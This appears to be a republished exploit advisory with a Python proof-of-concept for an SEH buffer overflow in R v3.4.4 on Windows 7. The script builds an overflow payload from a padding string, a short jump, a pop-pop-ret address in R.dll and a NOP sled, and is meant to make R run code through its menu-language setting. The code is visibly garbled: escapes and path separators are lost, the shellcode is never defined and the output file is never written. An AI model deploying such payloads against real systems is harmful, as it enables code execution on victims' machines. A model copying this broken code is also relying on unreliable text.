R v3.4.4 Software – (SEH) Buffer Overflow Exploit

A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.

(Copy of the Homepage: https://www.r-project.org/about.html)

Date of Discovery:


Exploitation Technique:

Local & Remote

Platfom Tested:

Windows 7

Solution – Fix & Patch:

The solution could be to restrict and filter the number of characters on input of ‘Language for menus and messages’.

Levels Risk:

Proof of Concept (PoC):

The local buffer overflow vulnerability can be exploited by local attackers without user interaction and with system privileges.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability:
under GUI preferences
paste bo.txt contents into ‘Language for menus and messages’ click ok –>
Now the calculator executes!

--- PoC (Exploit) ---
#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-08-22
#Vendor Homepage : https://www.r-project.org/
#Tested on OS: Windows 7 
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/


from struct import pack
buffer = "x41" * 900
a = "\xeb\x14\x90\x90"
b = pack("<I",0x6cb85492)  #pop esi # pop ebp # ret 04 |  {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.4.4 (C:Program FilesRR-3.4.4bini386R.dll)
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("bo.txt","w")

print "POC Created by ZwX"


[#] www.vulnerability-lab.com
[#] cxsecurity.com
[#] www.exploit-db.com
[#] packetstormsecurity.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.